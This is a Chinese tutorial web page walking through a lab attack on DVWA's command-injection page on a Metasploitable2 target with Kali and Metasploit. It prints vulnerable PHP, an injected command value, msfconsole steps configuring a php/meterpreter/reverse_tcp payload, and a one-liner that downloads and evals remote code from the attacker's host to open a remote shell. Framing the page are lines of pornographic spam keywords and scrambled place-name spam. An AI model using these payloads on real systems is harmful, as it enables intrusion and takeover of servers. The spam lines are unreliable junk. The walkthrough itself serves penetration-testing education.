最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

Kali滲透測(cè)試之使用Metasploit對(duì)Web應(yīng)用的攻擊

 更新時(shí)間:2022年05月18日 08:49:41   作者:m0_54861649  
這篇文章主要介紹了Kali滲透測(cè)試:使用Metasploit對(duì)Web應(yīng)用的攻擊,這種漏洞源于Web應(yīng)用程序沒有對(duì)用戶輸入的內(nèi)容進(jìn)行準(zhǔn)確的驗(yàn)證,從而導(dǎo)致操作系統(tǒng)執(zhí)行了攻擊者輸入的命令,需要的朋友可以參考下

Web應(yīng)用程序的漏洞數(shù)量眾多,這里我們以其中一個(gè)命令注入漏洞為例復(fù)現(xiàn)一下。這種漏洞源于Web應(yīng)用程序沒有對(duì)用戶輸入的內(nèi)容進(jìn)行準(zhǔn)確的驗(yàn)證,從而導(dǎo)致操作系統(tǒng)執(zhí)行了攻擊者輸入的命令。下面是一段運(yùn)行在Metasploitable2靶機(jī)上的PHP腳本,它來自于DVWA,代碼如下:

<html>
  <body>
    <form name="ping" action="#" method="post">
      <input type="text" name="ip" size="30">
      <input type="submit" value="submit" name="submit">
    </form>
  </body>
</html>

首先是是一個(gè)帶有輸入框的頁面代碼,在瀏覽器中這段代碼會(huì)被執(zhí)行成一個(gè)如下圖所示的頁面:

當(dāng)用戶在 圖中所示的文本框中輸入一個(gè)IP地址,例如“127.0.0.1”,服務(wù)器會(huì)將這個(gè)值傳遞給下面的PHP腳本進(jìn)行處理。

<?php
  if(isset($_POST['submit'])){
    $target = $_REQUEST['ip'];
    $cmd = shell_exec('ping -c 3 '. $target);
  }
  ?>

該腳本會(huì)將用戶輸入的值“127.0.0.1”保存到變量$target中。這樣一來,將‘ping -c 3’與其連接起來,系統(tǒng)要執(zhí)行的命令就變成了以下形式:

shell_exec('ping -c 3 127.0.0.1');

shell_exec()是PHP中執(zhí)行系統(tǒng)命令的4個(gè)函數(shù)之一, 它通過shell環(huán)境執(zhí)行命令,并且將完整的輸出以字符串的方式返回。也就是說,PHP先運(yùn)行一個(gè)shell環(huán)境,然后讓shell進(jìn)程運(yùn)行命令,并且把所有輸出以字符串形式返回,如果程序執(zhí)行錯(cuò)誤或者沒有任何輸出,則返回null。

這命令執(zhí)行以后,PHP會(huì)調(diào)用操作系統(tǒng)對(duì)127.0.0.1這個(gè)IP地址執(zhí)行ping操作,這里使用參數(shù)-c(指定ping操作的次數(shù)),是因?yàn)長inux在進(jìn)行ping操作時(shí)不會(huì)自動(dòng)停止,所以需要限制ping的次數(shù)。

正常情況,用戶可以使用網(wǎng)站這個(gè)功能。但是這段代碼編寫并不安全,攻擊者可以借此來執(zhí)行除了ping之外的操作,而且很容易實(shí)現(xiàn)。攻擊者接著系統(tǒng)命令的特性,在輸入中國呢添加“|”或者“&&”管道符來執(zhí)行其他命令。例如在Linux系統(tǒng)中,“|”是管道命令操作符。利用“|”將兩個(gè)命令隔開,管道符左邊命令的輸出就會(huì)作為管道符右邊命令的輸入。如下圖所示:

提交這個(gè)參數(shù)以后,系統(tǒng)會(huì)執(zhí)行以下命令:

shell_exec('ping -c 3 127.0.0.1|id');

實(shí)際上,這里一共執(zhí)行了兩條命令,分別是“ping -c 127.0.0.1”和“id”,第一條命令的輸出會(huì)作為第二條命令的輸入,但是第一條命令的結(jié)果不會(huì)顯示,只有第二條命令的結(jié)果才會(huì)顯示出來。這就是命令注入漏洞,當(dāng)攻擊者發(fā)現(xiàn)目標(biāo)網(wǎng)站存在命令注入攻擊漏洞以后,可以很輕易地實(shí)現(xiàn)對(duì)其進(jìn)行滲透。

實(shí) 驗(yàn) 環(huán) 境

攻擊機(jī):Linux kali 5.10.0 IP: 192.168.68.125

服務(wù)器:Metasploitable2-Linux IP:192.168.68.205

接下來結(jié)合滲透工具M(jìn)etasploit來完成一次攻擊的示例,滲透的目標(biāo)是運(yùn)行了DVWA的Metasploitable2服務(wù)器。DVWA的“Command Execution”命令執(zhí)行漏洞界面,如下圖所示:

Metasploit中包含一個(gè)十分方便的模塊web_delivery,它包含了以下功能:

  • 生成一個(gè)木馬程序
  • 啟動(dòng)一個(gè)發(fā)布該木馬程序的服務(wù)器
  • 生成一條命令,當(dāng)目標(biāo)主機(jī)執(zhí)行這條命令以后,就會(huì)連接服務(wù)器A,下載并執(zhí)行該木馬程序

實(shí) 驗(yàn) 步 驟

1. 在Kali中啟動(dòng)并進(jìn)入msf6

輸入如下命令:

┌──(kali?kali)-[~]
└─$ msfconsole
msf6 >?

2. 啟動(dòng)web_delivery模塊

msf6 > use exploit/multi/script/web_delivery

這個(gè)模塊中涉及的參數(shù)如下圖所示:

我們需要指定目標(biāo)的類型,在本例中目標(biāo)是一臺(tái)運(yùn)行著PHP語言編寫的Web應(yīng)用程序的Linux服務(wù)器,所以可將類型指定為PHP。使用“show targets”命令可以看到web_delivery模塊所支持的類型,如下圖所示:

3. 設(shè)置木馬類型、木馬主控端IP地址和端口

輸入如下命令:

msf6 exploit(multi/script/web_delivery) > set target 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.68.125
msf6 exploit(multi/script/web_delivery) > set lport 8888

結(jié)果如下圖所示:

4. 執(zhí)行run

輸入run命令,模塊web_delivery會(huì)啟動(dòng)服務(wù)器。如下圖所示:

圖中紅框中的命令非常重要,它就是我們要在目標(biāo)系統(tǒng)上運(yùn)行的命令。

php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.68.125:8080/E7mvRltiKXUbdQ', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false])));

5. 在靶機(jī)DVWA中“Command Execution”頁面中注入命令

輸入一個(gè)由&&連接的IP地址和上面的命令,如下圖所示:

點(diǎn)擊“submit”按鈕,目標(biāo)系統(tǒng)就會(huì)下載并執(zhí)行木馬文件,之后會(huì)建立一個(gè)Meterpreter會(huì)話,如下圖所示:

6. 在Kali中查看session

會(huì)話已經(jīng)建立,但是該模塊不會(huì)自動(dòng)進(jìn)入Meterpreter會(huì)話,我們可以使用sessions命令查看已經(jīng)打開的活動(dòng)會(huì)話,輸入如下命令:

msf6 exploit(multi/script/web_delivery) > sessions

如下圖所示:

執(zhí)行如下命令,進(jìn)入會(huì)話中:

msf6 exploit(multi/script/web_delivery) > sessions -i 1

下圖演示了整個(gè)命令注入的完整過程:

到此這篇關(guān)于Kali滲透測(cè)試:使用Metasploit對(duì)Web應(yīng)用的攻擊的文章就介紹到這了,更多相關(guān)Kali滲透測(cè)試內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • Git與遠(yuǎn)程倉庫進(jìn)行關(guān)聯(lián)設(shè)置方式

    Git與遠(yuǎn)程倉庫進(jìn)行關(guān)聯(lián)設(shè)置方式

    本文介紹了如何安裝和配置Git,以及如何將其與GitHub和Gitee等遠(yuǎn)程倉庫進(jìn)行關(guān)聯(lián),通過修改配置文件和生成SSH密鑰,可以實(shí)現(xiàn)將本地項(xiàng)目同時(shí)推送到多個(gè)遠(yuǎn)程倉庫
    2024-11-11
  • 詳解Visual Studio中Git的簡(jiǎn)單使用

    詳解Visual Studio中Git的簡(jiǎn)單使用

    這篇文章主要介紹了Visual Studio中Git的簡(jiǎn)單使用,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2020-11-11
  • Matlab幾個(gè)常用的繪圖顏色搭配推薦

    Matlab幾個(gè)常用的繪圖顏色搭配推薦

    使用matlab畫圖時(shí),怎樣才能調(diào)出順眼的顏色呢?下面這篇文章主要給大家介紹了關(guān)于Matlab幾個(gè)常用的繪圖顏色搭配,文中通過圖文介紹的非常詳細(xì),需要的朋友可以參考下
    2022-07-07
  • 三招兩式 解決圖片盜鏈無法查看問題

    三招兩式 解決圖片盜鏈無法查看問題

    有些粗心大意的人轉(zhuǎn)貼時(shí),簡(jiǎn)單地把圖片復(fù)制了過來。可如果該網(wǎng)站的圖片設(shè)置為防止外部鏈接,我們遇到轉(zhuǎn)載的好帖,又找不到原出處,難道只有哀嘆的份么?
    2011-06-06
  • 樹莓派安裝mjpg-streamer使用攝像頭的方法

    樹莓派安裝mjpg-streamer使用攝像頭的方法

    這篇文章主要介紹了樹莓派安裝mjpg-streamer使用攝像頭,本文給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2021-03-03
  • git worktree與分支依賴隔離的使用場(chǎng)景分析

    git worktree與分支依賴隔離的使用場(chǎng)景分析

    git worktree?是 Git 命令,用于管理多分支工作區(qū),這篇文章主要介紹了git worktree與分支依賴隔離,需要的朋友可以參考下
    2024-04-04
  • vscode調(diào)試container中的程序的方法步驟

    vscode調(diào)試container中的程序的方法步驟

    本文主要介紹了vscode調(diào)試container中的程序的方法步驟,文中通過示例代碼介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2022-03-03
  • 如何在vscode中正確使用正則表達(dá)式進(jìn)行文檔內(nèi)容的替換編輯

    如何在vscode中正確使用正則表達(dá)式進(jìn)行文檔內(nèi)容的替換編輯

    正則表達(dá)式是一種強(qiáng)大的模式匹配工具,它具有廣泛的應(yīng)用,包括數(shù)據(jù)清洗、文本處理、文件搜索等方面,這篇文章主要給大家介紹了關(guān)于如何在vscode中正確使用正則表達(dá)式進(jìn)行文檔內(nèi)容的替換編輯,需要的朋友可以參考下
    2023-12-12
  • Azkaban報(bào)錯(cuò)-azkaban.executor.ExecutorManagerException: No active executors found

    Azkaban報(bào)錯(cuò)-azkaban.executor.ExecutorManagerException: No acti

    這篇文章主要介紹了Azkaban報(bào)錯(cuò)-azkaban.executor.ExecutorManagerException: No active executors found,本文給大家介紹的非常詳細(xì),需要的朋友可以參考下
    2020-05-05
  • vscode中模糊搜索和替換案例解析

    vscode中模糊搜索和替換案例解析

    這篇文章主要介紹了vscode中模糊搜索和替換案例解析,本文給大家介紹的非常詳細(xì),感興趣的朋友跟隨小編一起看看吧
    2024-06-06

最新評(píng)論

巴林左旗| 历史| 惠水县| 湖口县| 土默特右旗| 五莲县| 宁武县| 乌鲁木齐县| 青岛市| 安西县| 丽水市| 错那县| 桦川县| 三台县| 曲周县| 五莲县| 三原县| 泌阳县| 吐鲁番市| 绥棱县| 崇信县| 南和县| 大姚县| 江西省| 阳高县| 贡觉县| 南京市| 株洲市| 红原县| 广元市| 榆中县| 依安县| 宜兴市| 南京市| 高青县| 虎林市| 上饶市| 蕲春县| 冷水江市| 禹州市| 罗山县|